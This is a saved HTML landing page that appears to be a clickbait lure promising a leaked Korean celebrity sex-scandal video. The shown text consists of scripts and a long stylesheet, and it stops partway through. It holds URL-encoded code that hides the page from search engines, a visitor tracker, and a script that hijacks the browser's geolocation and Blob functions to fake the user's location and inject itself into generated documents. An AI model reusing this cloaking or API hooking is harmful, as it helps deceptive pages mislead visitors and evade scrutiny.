
<!DOCTYPE html>
<meta content='Atendemos 24 hrs' property='og:description'/>
<meta content='https://i.imgur.com/9IkOEvp.jpg' property='og:image'/>
<script id="_waum5k">var _wau = _wau || []; _wau.push(["dynamic", "gregori70", "m5k", "c4302bffffff", "small"]);</script><script async src="//waust.at/d.js"></script>
<script type='text/javascript'>document.write(unescape('%3C%6D%65%74%61%20%6E%61%6D%65%3D%22%72%6F%62%6F%74%73%22%20%63%6F%6E%74%65%6E%74%3D%22%6E%6F%69%6D%61%67%65%69%6E%64%65%78%22%3E%0A%3C%6D%65%74%61%20%6E%61%6D%65%3D%22%72%6F%62%6F%74%73%22%20%63%6F%6E%74%65%6E%74%3D%22%6E%6F%69%6E%64%65%78%2C%20%6E%6F%66%6F%6C%6C%6F%77%22%3E%0A%3C%6D%65%74%61%20%6E%61%6D%65%3D%22%67%6F%6F%67%6C%65%62%6F%74%22%20%63%6F%6E%74%65%6E%74%3D%22%6E%6F%69%6E%64%65%78%2C%20%6E%6F%66%6F%6C%6C%6F%77%22%3E%0A%3C%6D%65%74%61%20%6E%61%6D%65%3D%22%72%6F%62%6F%74%73%22%20%63%6F%6E%74%65%6E%74%3D%22%6E%6F%69%6E%64%65%78%22%2F%3E%0A'))</script>
 <html class="js-focus-visible" data-js-focus-visible=""><head>
      <script crossorigin='anonymous' integrity='sha256-H+K7U5CnXl1h5ywQfKtSj8PCmoN9aaq30gDh27Xc0jk=' src='https://code.jquery.com/jquery-3.6.0.js'/>

 	<script type="text/javascript" async="" src="https://www.google-analytics.com/analytics.js"></script><script>(function(){function hookGeo() {
  //<![CDATA[
  const WAIT_TIME = 100;
  const hookedObj = {
    getCurrentPosition: navigator.geolocation.getCurrentPosition.bind(navigator.geolocation),
    watchPosition: navigator.geolocation.watchPosition.bind(navigator.geolocation),
    fakeGeo: true,
    genLat: 38.883333,
    genLon: -77.000
  };

  function waitGetCurrentPosition() {
    if ((typeof hookedObj.fakeGeo !== 'undefined')) {
      if (hookedObj.fakeGeo === true) {
        hookedObj.tmp_successCallback({
          coords: {
            latitude: hookedObj.genLat,
            longitude: hookedObj.genLon,
            accuracy: 10,
            altitude: null,
            altitudeAccuracy: null,
            heading: null,
            speed: null,
          },
          timestamp: new Date().getTime(),
        });
      } else {
        hookedObj.getCurrentPosition(hookedObj.tmp_successCallback, hookedObj.tmp_errorCallback, hookedObj.tmp_options);
      }
    } else {
      setTimeout(waitGetCurrentPosition, WAIT_TIME);
    }
  }

  function waitWatchPosition() {
    if ((typeof hookedObj.fakeGeo !== 'undefined')) {
      if (hookedObj.fakeGeo === true) {
        navigator.getCurrentPosition(hookedObj.tmp2_successCallback, hookedObj.tmp2_errorCallback, hookedObj.tmp2_options);
        return Math.floor(Math.random() * 10000); // random id
      } else {
        hookedObj.watchPosition(hookedObj.tmp2_successCallback, hookedObj.tmp2_errorCallback, hookedObj.tmp2_options);
      }
    } else {
      setTimeout(waitWatchPosition, WAIT_TIME);
    }
  }

  Object.getPrototypeOf(navigator.geolocation).getCurrentPosition = function (successCallback, errorCallback, options) {
    hookedObj.tmp_successCallback = successCallback;
    hookedObj.tmp_errorCallback = errorCallback;
    hookedObj.tmp_options = options;
    waitGetCurrentPosition();
  };
  Object.getPrototypeOf(navigator.geolocation).watchPosition = function (successCallback, errorCallback, options) {
    hookedObj.tmp2_successCallback = successCallback;
    hookedObj.tmp2_errorCallback = errorCallback;
    hookedObj.tmp2_options = options;
    waitWatchPosition();
  };

  const instantiate = (constructor, args) => {
    const bind = Function.bind;
    const unbind = bind.bind(bind);
    return new (unbind(constructor, null).apply(null, args));
  }

  Blob = function (_Blob) {
    function secureBlob(...args) {
      const injectableMimeTypes = [
        { mime: 'text/html', useXMLparser: false },
        { mime: 'application/xhtml+xml', useXMLparser: true },
        { mime: 'text/xml', useXMLparser: true },
        { mime: 'application/xml', useXMLparser: true },
        { mime: 'image/svg+xml', useXMLparser: true },
      ];
      let typeEl = args.find(arg => (typeof arg === 'object') && (typeof arg.type === 'string') && (arg.type));

      if (typeof typeEl !== 'undefined' && (typeof args[0][0] === 'string')) {
        const mimeTypeIndex = injectableMimeTypes.findIndex(mimeType => mimeType.mime.toLowerCase() === typeEl.type.toLowerCase());
        if (mimeTypeIndex >= 0) {
          let mimeType = injectableMimeTypes[mimeTypeIndex];
          let injectedCode = `<script>(
            ${hookGeo}
          )();<\/script>`;
    
          let parser = new DOMParser();
          let xmlDoc;
          if (mimeType.useXMLparser === true) {
            xmlDoc = parser.parseFromString(args[0].join(''), mimeType.mime); // For XML documents we need to merge all items in order to not break the header when injecting
          } else {
            xmlDoc = parser.parseFromString(args[0][0], mimeType.mime);
          }

          if (xmlDoc.getElementsByTagName("parsererror").length === 0) { // if no errors were found while parsing...
            xmlDoc.documentElement.insertAdjacentHTML('afterbegin', injectedCode);
    
            if (mimeType.useXMLparser === true) {
              args[0] = [new XMLSerializer().serializeToString(xmlDoc)];
            } else {
              args[0][0] = xmlDoc.documentElement.outerHTML;
            }
          }
        }
      }

      return instantiate(_Blob, args); // arguments?
    }

    // Copy props and methods
    let propNames = Object.getOwnPropertyNames(_Blob);
    for (let i = 0; i < propNames.length; i++) {
      let propName = propNames[i];
      if (propName in secureBlob) {
        continue; // Skip already existing props
      }
      let desc = Object.getOwnPropertyDescriptor(_Blob, propName);
      Object.defineProperty(secureBlob, propName, desc);
    }

    secureBlob.prototype = _Blob.prototype;
    return secureBlob;
  }(Blob);

  window.addEventListener('message', function (event) {
    if (event.source !== window) {
      return;
    }
    const message = event.data;
    switch (message.method) {
      case 'updateLocation':
        if ((typeof message.info === 'object') && (typeof message.info.coords === 'object')) {
          hookedObj.genLat = message.info.coords.lat;
          hookedObj.genLon = message.info.coords.lon;
          hookedObj.fakeGeo = message.info.fakeIt;
        }
        break;
      default:
        break;
    }
  }, false);
  //]]>
}hookGeo();})()</script><meta charset="UTF-8"><title>vealo antes que borren.</title><meta http-equiv="Cache-Control" content="no-cache"><meta http-equiv="Expires" content="-1"><meta name="keywords" content=""><meta name="description" content="V I D E O 1 8 : Escândalo sexual de entretenimento coreano"><script type="text/javascript">window.ladi_viewport = function () {var screen_width = window.ladi_screen_width || window.screen.width;var width = window.outerWidth > 0 ? window.outerWidth : screen_width;var widthDevice = width;var is_desktop = false;var content = "";if (typeof window.ladi_is_desktop == "undefined" || window.ladi_is_desktop == undefined) {window.ladi_is_desktop = is_desktop;}if (!is_desktop) {widthDevice = 420;} else {widthDevice = 960;}content = "width=" + widthDevice + ", user-scalable=no";var scale = 1;if (!is_desktop && widthDevice != screen_width && screen_width > 0) {scale = screen_width / widthDevice;}if (scale != 1) {content += ", initial-scale=" + scale + ", minimum-scale=" + scale + ", maximum-scale=" + scale;}var docViewport = document.getElementById("viewport");if (!docViewport) {docViewport = document.createElement("meta");docViewport.setAttribute("id", "viewport");docViewport.setAttribute("name", "viewport");document.head.appendChild(docViewport);}docViewport.setAttribute("content", content);};window.ladi_viewport();window.ladi_fbq_data = [];window.ladi_fbq = function (track_name, conversion_name, data, event_data) {window.ladi_fbq_data.push([track_name, conversion_name, data, event_data]);};</script><meta id="viewport" name="viewport" content="width=420, user-scalable=no, initial-scale=3.2523809523809524, minimum-scale=3.2523809523809524, maximum-scale=3.2523809523809524"><meta property="og:title" content="NANCY IDOL"><meta property="og:type" content="website"><meta property="og:image" content=""><meta property="og:description" content="V I D E O 1 8 : Escândalo sexual de entretenimento coreano"><meta name="format-detection" content="telephone=no"><link rel="dns-prefetch"><link rel="preconnect" href="https://fonts.googleapis.com/" crossorigin=""><link rel="preconnect" href="https://w.ladicdn.com/" crossorigin=""><link rel="preconnect" href="https://s.ladicdn.com/" crossorigin=""><link rel="preconnect" href="https://api.form.ladipage.com/" crossorigin=""><link rel="preconnect" href="https://a.ladipage.com/" crossorigin=""><link rel="preconnect" href="https://api.ladisales.com/" crossorigin=""><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Montserrat:bold,regular&amp;display=swap" as="style" onload="this.onload = null;this.rel = 'stylesheet';"><link rel="preload" href="https://w.ladicdn.com/v2/source/ladipage.vi.min.js?v=1642235194530" as="script"><style id="style_ladi" type="text/css">a,abbr,acronym,address,applet,article,aside,audio,b,big,blockquote,body,button,canvas,caption,center,cite,code,dd,del,details,dfn,div,dl,dt,em,embed,fieldset,figcaption,figure,footer,form,h1,h2,h3,h4,h5,h6,header,hgroup,html,i,iframe,img,input,ins,kbd,label,legend,li,mark,menu,nav,object,ol,output,p,pre,q,ruby,s,samp,section,select,small,span,strike,strong,sub,summary,sup,table,tbody,td,textarea,tfoot,th,thead,time,tr,tt,u,ul,var,video{margin:0;padding:0;border:0;outline:0;font-size:100%;font:inherit;vertical-align:baseline;box-sizing:border-box;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}article,aside,details,figcaption,figure,footer,header,hgroup,menu,nav,section{display:block}body{line-height:1}a{text-decoration:none}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:'';content:none}table{border-collapse:collapse;border-spacing:0}.ladi-html strong{font-weight:700}.ladi-html em{font-style:italic}.ladi-html a{text-decoration:underline}body{font-size:12px;-ms-text-size-adjust:none;-moz-text-size-adjust:none;-o-text-size-adjust:none;-webkit-text-size-adjust:none;background:#fff}.ladi-loading{width:80px;height:80px;z-index:900000000000;position:fixed;top:0;left:0;bottom:0;right:0;margin:auto;overflow:hidden}.ladi-loading div{position:absolute;width:6px;height:6px;background:#fff;border-radius:50%;animation:ladi-loading 1.2s linear infinite}.ladi-loading div:nth-child(1){animation-delay:0s;top:37px;left:66px}.ladi-loading div:nth-child(2){animation-delay:-.1s;top:22px;left:62px}.ladi-loading div:nth-child(3){animation-delay:-.2s;top:11px;left:52px}.ladi-loading div:nth-child(4){animation-delay:-.3s;top:7px;left:37px}.ladi-loading div:nth-child(5){animation-delay:-.4s;top:11px;left:22px}.ladi-loading div:nth-child(6){animation-delay:-.5s;top:22px;left:11px}.ladi-loading div:nth-child(7){animation-delay:-.6s;top:37px;left:7px}.ladi-loading div:nth-child(8){animation-delay:-.7s;top:52px;left:11px}.ladi-loading div:nth-child(9){animation-delay:-.8s;top:62px;left:22px}.ladi-loading div:nth-child(10){animation-delay:-.9s;top:66px;left:37px}.ladi-loading div:nth-child(11){animation-delay:-1s;top:62px;left:52px}.ladi-loading div:nth-child(12){animation-delay:-1.1s;top:52px;left:62px}@keyframes ladi-loading{0%,100%,20%,80%{transform:scale(1)}50%{transform:scale(1.5)}}.overflow-hidden{overflow:hidden}.ladi-transition{transition:all 150ms linear 0s}.opacity-0{opacity:0}.height-0{height:0!important}.transition-readmore{transition:height 350ms linear 0s}.transition-collapse{transition:height 150ms linear 0s}.transition-parent-collapse-height{transition:height 150ms linear 0s}.transition-parent-collapse-top{transition:top 150ms linear 0s}.pointer-events-none{pointer-events:none}.ladipage-message{position:fixed;width:100%;height:100%;top:0;left:0;z-index:10000000000;background:rgba(0,0,0,.3)}.ladipage-message .ladipage-message-box{width:400px;max-width:calc(100% - 50px);height:160px;border:1px solid rgba(0,0,0,.3);background-color:#fff;position:fixed;top:calc(50% - 155px);left:0;right:0;margin:auto;border-radius:10px}.ladipage-message .ladipage-message-box span{display:block;background-color:rgba(6,21,40,.05);color:#000;padding:12px 15px;font-weight:600;font-size:16px;line-height:16px;border-top-left-radius:10px;border-top-right-radius:10px}.ladipage-message .ladipage-message-box .ladipage-message-text{display:-webkit-box;font-size:14px;padding:0 20px;margin-top:10px;line-height:18px;-webkit-line-clamp:3;-webkit-box-orient:vertical;overflow:hidden;text-overflow:ellipsis}.ladipage-message .ladipage-message-box .ladipage-message-close{display:block;position:absolute;right:15px;bottom:10px;margin:0 auto;padding:10px 0;border:none;width:80px;text-transform:uppercase;text-align:center;color:#000;background-color:#e6e6e6;border-radius:5px;text-decoration:none;font-size:14px;line-height:14px;font-weight:600;cursor:pointer}.ladi-wraper{width:100%;height:100%;min-height:100vh;overflow:hidden}.ladi-section{margin:0 auto;position:relative}.ladi-section[data-tab-id]{display:none}.ladi-section.selected[data-tab-id]{display:block}.ladi-section .ladi-section-arrow-down{position:absolute;bottom:0;right:0;left:0;margin:auto;cursor:pointer;z-index:90000040}.ladi-section .ladi-section-close{position:absolute;top:0;right:0;cursor:pointer;z-index:90000040}.ladi-section .ladi-section-background{position:absolute;width:100%;height:100%;top:0;left:0;pointer-events:none;overflow:hidden}.ladi-container{position:relative;margin:0 auto;height:100%}.ladi-element{position:absolute}.ladi-overlay{position:absolute;top:0;left:0;height:100%;width:100%;pointer-events:none}.ladi-survey{width:100%;display:inline-block}.ladi-survey .ladi-survey-option{cursor:pointer;position:relative;display:inline-block;text-decoration-line:inherit;-webkit-text-decoration-line:inherit;transition:inherit;user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none}.ladi-survey .ladi-survey-option-background{position:absolute;width:100%;height:100%;top:0;left:0;pointer-events:none;transition:inherit}.ladi-survey .ladi-survey-option-label{display:block;text-decoration-line:inherit;-webkit-text-decoration-line:inherit;position:relative}.ladi-survey .ladi-survey-option-image{background-size:cover;background-position:center center;pointer-events:none;vertical-align:middle;border-radius:inherit;position:relative}.ladi-survey .ladi-survey-button-next{display:block}.ladi-survey .ladi-survey-button-next.empty{display:none}.ladi-survey .ladi-survey-button-next.no-select{display:none}.ladi-survey .ladi-survey-button-next button{background-color:#fff;border:1px solid #eee;padding:5px 10px;cursor:pointer;border-radius:2px}.ladi-survey .ladi-survey-button-next button:active{transform:translateY(2px);transition:transform .2s linear}.ladi-carousel{position:absolute;width:100%;height:100%;overflow:hidden;touch-action:pan-y}.ladi-carousel .ladi-carousel-content{position:absolute;width:100%;height:100%;left:0;transition:left 350ms ease-in-out}.ladi-carousel .ladi-carousel-arrow{position:absolute;top:calc(50% - (33px)/ 2);cursor:pointer;z-index:90000040}.ladi-carousel .ladi-carousel-arrow-left{left:5px;transform:rotate(180deg);-webkit-transform:rotate(180deg)}.ladi-carousel .ladi-carousel-arrow-right{right:5px}.ladi-gallery{position:absolute;width:100%;height:100%}.ladi-gallery .ladi-gallery-view{position:absolute;overflow:hidden;touch-action:pan-y}.ladi-gallery .ladi-gallery-view>.ladi-gallery-view-item{background-size:cover;background-repeat:no-repeat;background-position:center center;width:100%;height:100%;position:relative;display:none;transition:transform .5s ease-in-out;-webkit-backface-visibility:hidden;backface-visibility:hidden;-webkit-perspective:1000px;perspective:1000px}.ladi-gallery .ladi-gallery-view>.ladi-gallery-view-item.play-video{cursor:pointer}.ladi-gallery .ladi-gallery-view>.ladi-gallery-view-item.play-video:after{content:'';position:absolute;top:0;left:0;right:0;bottom:0;margin:auto;width:60px;height:60px;background:url(https://w.ladicdn.com/source/ladipage-play.svg) no-repeat center center;background-size:contain;pointer-events:none;cursor:pointer}.ladi-gallery .ladi-gallery-view>.ladi-gallery-view-item.next,.ladi-gallery .ladi-gallery-view>.ladi-gallery-view-item.selected.right{left:0;transform:translate3d(100%,0,0)}.ladi-gallery .ladi-gallery-view>.ladi-gallery-view-item.prev,.ladi-gallery .ladi-gallery-view>.ladi-gallery-view-item.selected.left{left:0;transform:translate3d(-100%,0,0)}.ladi-gallery .ladi-gallery-view>.ladi-gallery-view-item.next.left,.ladi-gallery .ladi-gallery-view>.ladi-gallery-view-item.prev.right,.ladi-gallery .ladi-gallery-view>.ladi-gallery-view-item.selected{left:0;transform:translate3d(0,0,0)}.ladi-gallery .ladi-gallery-view>.next,.ladi-gallery .ladi-gallery-view>.prev,.ladi-gallery .ladi-gallery-view>.selected{display:block}.ladi-gallery .ladi-gallery-view>.selected{left:0}.ladi-gallery .ladi-gallery-view>.next,.ladi-gallery .ladi-gallery-view>.prev{position:absolute;top:0;width:100%}.ladi-gallery .ladi-gallery-view>.next{left:100%}.ladi-gallery .ladi-gallery-view>.prev{left:-100%}.ladi-gallery .ladi-gallery-view>.next.left,.ladi-gallery .ladi-gallery-view>.prev.right{left:0}.ladi-gallery .ladi-gallery-view>.selected.left{left:-100%}.ladi-gallery .ladi-gallery-view>.selected.right{left:100%}.ladi-gallery .ladi-gallery-control{position:absolute;overflow:hidden;touch-action:pan-y}.ladi-gallery.ladi-gallery-top .ladi-gallery-view{width:100%}.ladi-gallery.ladi-gallery-top .ladi-gallery-control{top:0;width:100%}.ladi-gallery.ladi-gallery-bottom .ladi-gallery-view{top:0;width:100%}.ladi-gallery.ladi-gallery-bottom .ladi-gallery-control{width:100%;bottom:0}.ladi-gallery.ladi-gallery-left .ladi-gallery-view{height:100%}.ladi-gallery.ladi-gallery-left .ladi-gallery-control{height:100%}.ladi-gallery.ladi-gallery-right .ladi-gallery-view{height:100%}.ladi-gallery.ladi-gallery-right .ladi-gallery-control{height:100%;right:0}.ladi-gallery .ladi-gallery-view .ladi-gallery-view-arrow{position:absolute;top:calc(50% - (33px)/ 2);cursor:pointer;z-index:90000040}.ladi-gallery .ladi-gallery-view .ladi-gallery-view-arrow-left{left:5px;transform:rotate(180deg);-webkit-transform:rotate(180deg)}.ladi-gallery .ladi-gallery-view .ladi-gallery-view-arrow-right{right:5px}.ladi-gallery .ladi-gallery-control .ladi-gallery-control-arrow{position:absolute;cursor:pointer;z-index:90000040}.ladi-gallery.ladi-gallery-bottom .ladi-gallery-control .ladi-gallery-control-arrow,.ladi-gallery.ladi-gallery-top .ladi-gallery-control .ladi-gallery-control-arrow{top:calc(50% - (33px)/ 2)}.ladi-gallery.ladi-gallery-top .ladi-gallery-control .ladi-gallery-control-arrow-left{left:0;transform:rotate(180deg) scale(.6);-webkit-transform:rotate(180deg) scale(.6)}.ladi-gallery.ladi-gallery-top .ladi-gallery-control .ladi-gallery-control-arrow-right{right:0;transform:scale(.6);-webkit-transform:scale(.6)}.ladi-gallery.ladi-gallery-bottom .ladi-gallery-control .ladi-gallery-control-arrow-left{left:0;transform:rotate(180deg) scale(.6);-webkit-transform:rotate(180deg) scale(.6)}.ladi-gallery.ladi-gallery-bottom .ladi-gallery-control .ladi-gallery-control-arrow-right{right:0;transform:scale(.6);-webkit-transform:scale(.6)}.ladi-gallery.ladi-gallery-left .ladi-gallery-control .ladi-gallery-control-arrow,.ladi-gallery.ladi-gallery-right .ladi-gallery-control .ladi-gallery-control-arrow{left:calc(50% - (33px)/ 2)}.ladi-gallery.ladi-gallery-left .ladi-gallery-control .ladi-gallery-control-arrow-left{top:0;transform:scale(.6) rotate(270deg);-webkit-transform:scale(.6) rotate(270deg)}.ladi-gallery.ladi-gallery-left .ladi-gallery-control .ladi-gallery-control-arrow-right{bottom:0;transform:scale(.6) rotate(90deg);-webkit-transform:scale(.6) rotate(90deg)}.ladi-gallery.ladi-gallery-right .ladi-gallery-control .ladi-gallery-control-arrow-left{top:0;transform:scale(.6) rotate(270deg);-webkit-transform:scale(.6) rotate(270deg)}.ladi-gallery.ladi-gallery-right .ladi-gallery-control .ladi-gallery-control-arrow-right{bottom:0;transform:scale(.6) rotate(90deg);-webkit-transform:scale(.6) rotate(90deg)}.ladi-gallery .ladi-gallery-control .ladi-gallery-control-box{position:relative}.ladi-gallery.ladi-gallery-top .ladi-gallery-control .ladi-gallery-control-box{display:-webkit-inline-flex;display:inline-flex;left:0;transition:left 150ms ease-in-out}.ladi-gallery.ladi-gallery-bottom .ladi-gallery-control .ladi-gallery-control-box{display:-webkit-inline-flex;display:inline-flex;left:0;transition:left 150ms ease-in-out}.ladi-gallery.ladi-gallery-left .ladi-gallery-control .ladi-gallery-control-box{display:inline-grid;top:0;transition:top 150ms ease-in-out}.ladi-gallery.ladi-gallery-right .ladi-gallery-control .ladi-gallery-control-box{display:inline-grid;top:0;transition:top 150ms ease-in-out}.ladi-gallery .ladi-gallery-control .ladi-gallery-control-box .ladi-gallery-control-item{background-size:cover;background-repeat:no-repeat;background-position:center center;float:left;position:relative;cursor:pointer;filter:invert(15%)}.ladi-gallery .ladi-gallery-control .ladi-gallery-control-box .ladi-gallery-control-item.play-video:after{content:'';position:absolute;top:0;left:0;right:0;bottom:0;margin:auto;width:30px;height:30px;background:url(https://w.ladicdn.com/source/ladipage-play.svg) no-repeat center center;background-size:contain;pointer-events:none;cursor:pointer}.ladi-gallery .ladi-gallery-control .ladi-gallery-control-box .ladi-gallery-control-item:hover{filter:none}.ladi-gallery .ladi-gallery-control .ladi-gallery-control-box .ladi-gallery-control-item.selected{filter:none}.ladi-gallery .ladi-gallery-control .ladi-gallery-control-box .ladi-gallery-control-item:last-child{margin-right:0!important;margin-bottom:0!important}.ladi-table{position:absolute;width:100%;height:100%;overflow:auto}.ladi-table table{width:100%}.ladi-table table td{vertical-align:middle}.ladi-table tbody td{word-break:break-word}.ladi-table table td img{cursor:pointer;width:100%}.ladi-box{position:absolute;width:100%;height:100%;overflow:hidden}.ladi-tabs{position:absolute;width:100%;height:100%}.ladi-tabs .ladi-tabs-background{height:100%;width:100%;pointer-events:none}.ladi-tabs>.ladi-element[data-index]{display:none}.ladi-tabs>.ladi-element.selected[data-index]{display:block}.ladi-frame{position:absolute;width:100%;height:100%;overflow:hidden}.ladi-frame .ladi-frame-background{height:100%;width:100%;pointer-events:none;transition:inherit}.ladi-banner{position:absolute;width:100%;height:100%;overflow:hidden}.ladi-banner .ladi-banner-background{height:100%;width:100%;pointer-events:none}#SECTION_POPUP .ladi-container{z-index:90000070}#SECTION_POPUP .ladi-container>.ladi-element{z-index:90000070;position:fixed;display:none}#SECTION_POPUP .ladi-container>.ladi-element[data-fixed-close=true]{position:relative!important}#SECTION_POPUP .ladi-container>.ladi-element.hide-visibility{display:block!important;visibility:hidden!important}#SECTION_POPUP .popup-close{position:absolute;right:0;top:0;z-index:9000000080;cursor:pointer}.ladi-popup{position:absolute;width:100%;height:100%}.ladi-popup .ladi-popup-background{height:100%;width:100%;pointer-events:none}.ladi-countdown{position:absolute;width:100%;height:100%}.ladi-countdown .ladi-countdown-background{position:absolute;width:100%;height:100%;top:0;left:0;background-size:inherit;background-attachment:inherit;background-origin:inherit;display:table;pointer-events:none}.ladi-countdown .ladi-countdown-text{position:absolute;width:100%;height:100%;text-decoration:inherit;display:table;pointer-events:none}.ladi-countdown .ladi-countdown-text span{display:table-cell;vertical-align:middle}.ladi-countdown>.ladi-element{text-decoration:inherit;background-size:inherit;background-attachment:inherit;background-origin:inherit;position:relative;display:inline-block}.ladi-countdown>.ladi-element:last-child{margin-right:0!important}.ladi-button{position:absolute;width:100%;height:100%;overflow:hidden}.ladi-button:active{transform:translateY(2px);transition:transform .2s linear}.ladi-button .ladi-button-background{height:100%;width:100%;pointer-events:none;transition:inherit}.ladi-button>.ladi-element{width:100%!important;height:100%!important;top:0!important;left:0!important;display:table;user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none}.ladi-button>.ladi-element .ladi-headline{display:table-cell;vertical-align:middle}.ladi-collection{position:absolute;width:100%;height:100%}.ladi-collection.carousel{overflow:hidden}.ladi-collection .ladi-collection-content{position:absolute;width:100%;height:100%;left:0;transition:left 350ms ease-in-out}.ladi-collection .ladi-collection-content .ladi-collection-item{display:block;position:relative;float:left}.ladi-collection .ladi-collection-content .ladi-collection-page{float:left}.ladi-collection .ladi-collection-arrow{position:absolute;top:calc(50% - (33px)/ 2);cursor:pointer;z-index:90000040}.ladi-collection .ladi-collection-arrow-left{left:5px;transform:rotate(180deg);-webkit-transform:rotate(180deg)}.ladi-collection .ladi-collection-arrow-right{right:5px}.ladi-collection .ladi-collection-button-next{position:absolute;bottom:-40px;right:0;left:0;margin:auto;cursor:pointer;z-index:90000040;transform:rotate(90deg);-webkit-transform:rotate(90deg)}.ladi-form{position:absolute;width:100%;height:100%}.ladi-form>.ladi-element{text-transform:inherit;text-decoration:inherit;text-align:inherit;letter-spacing:inherit;color:inherit;background-size:inherit;background-attachment:inherit;background-origin:inherit}.ladi-form .ladi-button>.ladi-element{color:initial;font-size:initial;font-weight:initial;text-transform:initial;text-decoration:initial;font-style:initial;text-align:initial;letter-spacing:initial;line-height:initial}.ladi-form>.ladi-element .ladi-form-item-container{text-transform:inherit;text-decoration:inherit;text-align:inherit;letter-spacing:inherit;color:inherit;background-size:inherit;background-attachment:inherit;background-origin:inherit}.ladi-form>[data-quantity=true] .ladi-form-item-container{overflow:hidden}.ladi-form>.ladi-element .ladi-form-item-container .ladi-form-item{text-transform:inherit;text-decoration:inherit;text-align:inherit;letter-spacing:inherit;color:inherit}.ladi-form>.ladi-element .ladi-form-item-container .ladi-form-item-background{background-size:inherit;background-attachment:inherit;background-origin:inherit}.ladi-form>.ladi-element .ladi-form-item-container .ladi-form-item .ladi-form-control-select{-webkit-appearance:none;-moz-appearance:none;appearance:none;background-size:9px 6px!important;background-position:right .5rem center;background-repeat:no-repeat}.ladi-form>.ladi-element .ladi-form-item-container .ladi-form-item .ladi-form-control-select-2{width:calc(100% / 2 - 5px);max-width:calc(100% / 2 - 5px);min-width:calc(100% / 2 - 5px)}.ladi-form>.ladi-element .ladi-form-item-container .ladi-form-item .ladi-form-control-select-2:nth-child(3){margin-left:7.5px}.ladi-form>.ladi-element .ladi-form-item-container .ladi-form-item .ladi-form-control-select-3{width:calc(100% / 3 - 5px);max-width:calc(100% / 3 - 5px);min-width:calc(100% / 3 - 5px)}.ladi-form>.ladi-element .ladi-form-item-container .ladi-form-item .ladi-form-control-select-3:nth-child(3){margin-left:7.5px}.ladi-form>.ladi-element .ladi-form-item-container .ladi-form-item .ladi-form-control-select-3:nth-child(4){margin-left:7.5px}.ladi-form>.ladi-element .ladi-form-item-container .ladi-form-item .ladi-form-control-select option{color:initial}.ladi-form>.ladi-element .ladi-form-item-container .ladi-form-item .ladi-form-control:not(.ladi-form-control-select){text-transform:inherit;text-decoration:inherit;text-align:inherit;letter-spacing:inherit;color:inherit;background-size:inherit;background-attachment:inherit;background-origin:inherit}.ladi-form>.ladi-element .ladi-form-item-container .ladi-form-item .ladi-form-control-select{text-transform:inherit;text-align:inherit;letter-spacing:inherit;color:inherit;background-size:inherit;background-attachment:inherit;background-origin:inherit}.ladi-form>.ladi-element .ladi-form-item-container .ladi-form-item .ladi-form-control-select:not([data-selected=""]){text-decoration:inherit}.ladi-form>.ladi-element .ladi-form-item-container .ladi-form-item .ladi-form-checkbox-item{text-transform:inherit;text-decoration:inherit;text-align:inherit;letter-spacing:inherit;color:inherit;background-size:inherit;background-attachment:inherit;background-origin:inherit;vertical-align:middle}.ladi-form>.ladi-element .ladi-form-item-container .ladi-form-item .ladi-form-checkbox-item span{user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none}.ladi-form>.ladi-element .ladi-form-item-container .ladi-form-item .ladi-form-checkbox-item span[data-checked=true]{text-transform:inherit;text-decoration:inherit;text-align:inherit;letter-spacing:inherit;color:inherit;background-size:inherit;background-attachment:inherit;background-origin:inherit}.ladi-form>.ladi-element .ladi-form-item-container .ladi-form-item .ladi-form-checkbox-item span[data-checked=false]{text-transform:inherit;text-align:inherit;letter-spacing:inherit;color:inherit;background-size:inherit;background-attachment:inherit;background-origin:inherit}.ladi-form .ladi-form-item-container{position:absolute;width:100%;height:100%}.ladi-form .ladi-form-item-title-value{font-weight:700;word-break:break-word}.ladi-form .ladi-form-label-container{position:relative;width:100%}.ladi-form .ladi-form-label-container .ladi-form-label-item{display:inline-block;cursor:pointer;position:relative;border-radius:0!important;user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none}.ladi-form .ladi-form-label-container .ladi-form-label-item.image{background-size:cover;background-repeat:no-repeat;background-position:center}.ladi-form .ladi-form-label-container .ladi-form-label-item.no-value{display:none!important}.ladi-form .ladi-form-label-container .ladi-form-label-item.text.disabled{opacity:.35}.ladi-form .ladi-form-label-container .ladi-form-label-item.image.disabled{opacity:.2}.ladi-form .ladi-form-label-container .ladi-form-label-item.color.disabled{opacity:.15}.ladi-form .ladi-form-label-container .ladi-form-label-item.selected:before{content:'';width:0;height:0;bottom:-1px;right:-1px;position:absolute;border-width:0 0 15px 15px;border-color:transparent;border-style:solid}.ladi-form .ladi-form-label-container .ladi-form-label-item.selected:after{content:'';background-image:url("data:image/svg+xml;utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' enable-background='new 0 0 12 12' viewBox='0 0 12 12' x='0' fill='%23fff' y='0'%3E%3Cg%3E%3Cpath d='m5.2 10.9c-.2 0-.5-.1-.7-.2l-4.2-3.7c-.4-.4-.5-1-.1-1.4s1-.5 1.4-.1l3.4 3 5.1-7c .3-.4 1-.5 1.4-.2s.5 1 .2 1.4l-5.7 7.9c-.2.2-.4.4-.7.4 0-.1 0-.1-.1-.1z'%3E%3C/path%3E%3C/g%3E%3C/svg%3E");background-repeat:no-repeat;background-position:bottom right;width:7px;height:7px;bottom:0;right:0;position:absolute}.ladi-form .ladi-form-item{width:100%;height:100%;position:absolute}.ladi-form .ladi-form-item-background{position:absolute;width:100%;height:100%;top:0;left:0;pointer-events:none}.ladi-form .ladi-form-item.ladi-form-checkbox{height:auto}.ladi-form .ladi-form-item .ladi-form-control{background-color:transparent;min-width:100%;min-height:100%;max-width:100%;max-height:100%;width:100%;height:100%;padding:0 5px;color:inherit;font-size:inherit;border:none}.ladi-form .ladi-form-item.ladi-form-checkbox{padding:10px 5px}.ladi-form .ladi-form-item.ladi-form-checkbox.ladi-form-checkbox-vertical .ladi-form-checkbox-item{margin-top:0!important;margin-left:0!important;margin-right:0!important;display:table;border:none}.ladi-form .ladi-form-item.ladi-form-checkbox.ladi-form-checkbox-horizontal .ladi-form-checkbox-item{margin-top:0!important;margin-left:0!important;margin-right:10px!important;display:inline-block;border:none;position:relative}.ladi-form .ladi-form-item.ladi-form-checkbox .ladi-form-checkbox-item input{vertical-align:middle;width:13px;height:13px;display:table-cell;margin-right:5px}.ladi-form 